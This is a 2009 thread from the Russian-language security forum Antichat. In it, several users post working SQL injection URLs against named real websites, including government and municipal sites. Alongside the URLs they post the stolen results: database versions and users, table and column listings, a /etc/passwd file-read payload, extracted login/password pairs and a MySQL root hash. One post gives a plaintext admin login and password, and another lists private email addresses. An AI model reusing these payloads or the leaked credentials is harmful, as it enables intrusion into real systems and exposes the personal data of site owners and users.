HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8291  
Старый 12.03.2009, 00:36
-m0rgan-
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134

Репутация: 519


Отправить сообщение для -m0rgan- с помощью ICQ
По умолчанию

Код:
http://www.nswfb.nsw.gov.au/page.php?id=-1+union+all+select+0,concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
юзер/версия/бд:

Код:
4.0.24-nt-max-log:vs161854_1@wic036p.server-web.com:vs161854_1
-----------------------------------------------------------------------------------------------------------------------
The End!
 
Ответить с цитированием

  #8292  
Старый 12.03.2009, 01:05
erihtoney
Познающий
Регистрация: 03.03.2009
Сообщений: 86
Провел на форуме:
994199

Репутация: 258
Отправить сообщение для erihtoney с помощью ICQ
По умолчанию

Цитата:
http://www.prudentialnwct.com/cms/index.php?id=-9999+union+select+1,2,3,concat_ws(0x203a3a3a20,ver sion(),user(),database()),5,6,7,8,9,10,11,12/*
version: 4.0.26
user: prudentiuser@prudentialnwct.com
database: prudentialnwct_com_new

Цитата:
http://www.prudentialnwct.com/cms/index.php?id=-9999+union+select+1,2,3,LOAD_FILE('/etc/passwd'),5,6,7,8,9,10,11,12/*
 
Ответить с цитированием

  #8293  
Старый 12.03.2009, 01:16
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.neodecor.ru/news/index.php?id=-1+union+select+1,2,3,concat _ws(0x3a,version(),database(),user())--
Database Version : 4.1.25-log
Database name : db00071921
User name : 00071921@localhost


-------------------------------------------------------+

Код:
http://www.alfatv.ru/main.php?lang_id=1&id=13&_cat_id_=36&_ser_=2+union+select+concat _ws(0x3a,version(),database(),user())--
Database Version : 4.1.22-log
Database name : wwwalfatvru_alfa
User name : alfatv@localhost
 
Ответить с цитированием

  #8294  
Старый 12.03.2009, 01:26
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.primariarecas.ro/index.php?topic=page&id=-6+union+select+concat_ws(0x3a,version(),database() ,user())


Database Version: 5.0.67-community
Database name: recas_content
User name: recas_webuser@localhost




www.primariarecas.ro/admin

login : recas
password: nokia
 
Ответить с цитированием

  #8295  
Старый 12.03.2009, 01:27
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

Код:
http://financialservicesconsulting.info/display.php?page=-1092+union+select+1,2,3,4,5,6,7,8,9,0/*
Database Version: 4.1.22-log
Database name: gfsc_db
User name: gfsc_dbman@localhost
 
Ответить с цитированием

  #8296  
Старый 12.03.2009, 02:17
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.primariascornicesti.ro/index.php?modul=pagini&pagina=-8+union+select+1,concat_ws(0x3a,version(),database (),user()),3


Database Version: 5.0.32-Debian_7etch1-log
Database name: scornicesti
User name: scornicesti@localhost


https://www.primariascornicesti.ro/admin

вход свободный, тоьлко мало функциональная админка по мне
 
Ответить с цитированием

  #8297  
Старый 12.03.2009, 03:21
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Код:
http://vb.by/article.php?topic=7&article=-4652+union+select+1,version(),3

vb.by
82.209.195.16
=============================
-------
Версия MySQL:
5.0.51a-log
-------
Имя базы:
vb
-------
Юзер:
vb@hosting
-------
@@basedir:
/usr/local/
-------
@@datadir:
/var/db/mysql/
-------
@@tmpdir:
/var/tmp/
-------
@@version_compile_os:
portbld-freebsd7.0
-------
mysql user:
No
-------
mysql password:
No
-------
file_priv:
No
-------
Кол-во таблиц в information_schema:
53
-------
Список таблиц из information_schema:
-------
1:CHARACTER_SETS
2:COLLATIONS
3:COLLATION_CHARACTER_SET_APPLICABILITY
4:COLUMNS
5:COLUMN_PRIVILEGES
6:KEY_COLUMN_USAGE
7:PROFILING
8:ROUTINES
9:SCHEMATA
10:SCHEMA_PRIVILEGES
11:STATISTICS
12:TABLES
13:TABLE_CONSTRAINTS
14:TABLE_PRIVILEGES
15:TRIGGERS
16:USER_PRIVILEGES
17:VIEWS
18:article
19:author
20:blog
21:blog_comment
22:cinema
23:comm_article
24:comm_baner
25:comm_date
26:comm_topic
27:comment
28:comment_block
29:concert
30:contest_comment
31:contest_image
32:contest_marks
33:contest_topic
34:exhibition
35:humor
36:mail
37:marks
38:online
39:online_person
40:online_question
41:photo
42:photo_comment
43:photo_image
44:project
45:publication
46:quest
47:quest_control
48:quest_poll
49:sport
50:theater
51:topic
52:who
53:who_link
-------
=============================
Префикс для таблицы mail (если данные не выводятся, попробуйте вставить в source_table.txt название таблицы так: префикс.таблица
-------
vb
-------
Количество колонок из таблицы mail:
-------
5
-------
Список колонок из таблицы mail:
-------
1:id
2:date
3:email
4:smail
5:status
-------
=============================
Количество значений из таблицы mail по полю id:
-------
8
-------
Данные по полям email,smail,status из таблицы mail:
-------
edcom@mail.ru:1
admin@virtualbrest.com:1
Ot_liudmila@bk.ru:1
lisaira@tut.by:1
Olga_15_92@mail.ru:1
kdn_2005@tut.by:1
artur33@012.net.il:1
2007vladimir-medved@tut.by:1
админка под .htaccess
 
Ответить с цитированием

  #8298  
Старый 12.03.2009, 06:06
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Агентство Бизнес Мониторинга

Код:
http://www.r52.ru/?rid=31+and+1=0+union+select+1,version(),3,4--
______________________________________

Все о бизнесе в сфере услуг и производства России

Код:
http://www.portaluslug.ru/profile/-32227+union+select+1,concat(login,0x3a,password),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+users+limit+1,1--.html

Последний раз редактировалось R1dex; 12.03.2009 в 06:49..
 
Ответить с цитированием

  #8299  
Старый 12.03.2009, 08:34
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Файл При Y, но ковычик слэшируются
Код:
http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,file_priv,5,6,7,8,9+from+mysql.user/*
Пассы
Код:
root:57f7a24f45500f72:cru1ser
 
Ответить с цитированием

  #8300  
Старый 12.03.2009, 09:19
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Сайт сервисного центра «Nokia»

Код:
http://nokiaservice.ru/?news_id=14'+and+substring((select+password+from+users+where+username='admin'),1,5)='aikon'/*
http://nokiaservice.ru/admin/
____________________________

Shaitan-Devil:

1. Ну и что, подумаешь, кавычки слэшируются.
2. file_priv "N", а не "Y".

Правильный запрос:

Код:
http://www.artport.co.nz/view.php?sid=-1+union+select+1,2,3,concat(user,0x3a,file_priv),5 ,6,7,8,9+from+mysql.user+limit+3,1/*

Последний раз редактировалось R1dex; 12.03.2009 в 09:43..
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ